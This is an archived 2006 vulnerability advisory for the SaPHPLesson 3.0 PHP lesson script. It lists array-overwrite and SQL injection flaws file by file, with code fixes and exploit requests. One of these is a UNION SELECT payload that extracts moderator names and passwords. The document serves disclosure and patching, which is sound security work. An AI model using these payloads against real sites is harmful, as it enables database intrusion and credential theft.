SaPHPLession30.txt

SaPHPLession30.txt: Posted May 6, 2006; Authored by D3vil-0x1; SaPHPLesson version 3.0 is susceptible to arbitrary input and SQL injection flaws.; tags | exploit, arbitrary, sql injection; SHA-256 | e144d79e0133c5bf2f15a75932738453c41e8cd66291c9016c3171bf4a1e0b69; Download | Favorite | View

SaPHPLession30.txt

SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:

  1- Unfilter array

      Filename  :- show.php
        Line    :- 102

[code]
$hrow[] = $Row2;[/code]

Fix :-

Add To Line [ 11 ] /show.php This Code :-

  we add the code to global to fix all unfilter ver. at the code :)

[code]
$hrow = array();[/code]

Exploit :-

  GET ^
    /lessons/show.php?lessid=1&hrow=D3vil-0x1

/---------------------------------------------------------/

  2- Unfilter array

      Filename  :- showcat.php
        Line    :- 80

[code]
$Lsnrow[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /showcat.php This Code :-

  we add the code to global to fix all unfilter ver. at the code :)

[code]
$Lsnrow = array();[/code]

Exploit :-

  GET ^

      /lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1

/---------------------------------------------------------/

  3- SQL Injection

      Filename  :- search.php
        Line    :- MultLines

Fix :-

  Line 28 Replace It With

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

  Line 32 Replace It With

[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]

  Exploit :-

      POST ^

      Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC

/---------------------------------------------------------/

  4- SQL Injection

      Filename  :- misc.php
        Line    :- 64

Fix :-
  Replace Line 62 & 63 With This Code

[code]
$LID  = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]

/---------------------------------------------------------/

  5- Unfilter array

      Filename  :- index.php
        Line    :- 24

[code]
$rows[] = $Row;[/code]

Fix :-

Add To Line [ 11 ] /index.php This Code :-

  we add the code to global to fix all unfilter ver. at the code :)

[code]
$rows = array();
$hrow = array();[/code]

Exploit :-

  GET ^

      /saphplesson/index.php?rows=D3vil-x01

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

SaPHPLession30.txt

SaPHPLession30.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SaPHPLession30.txt

Share This

SaPHPLession30.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems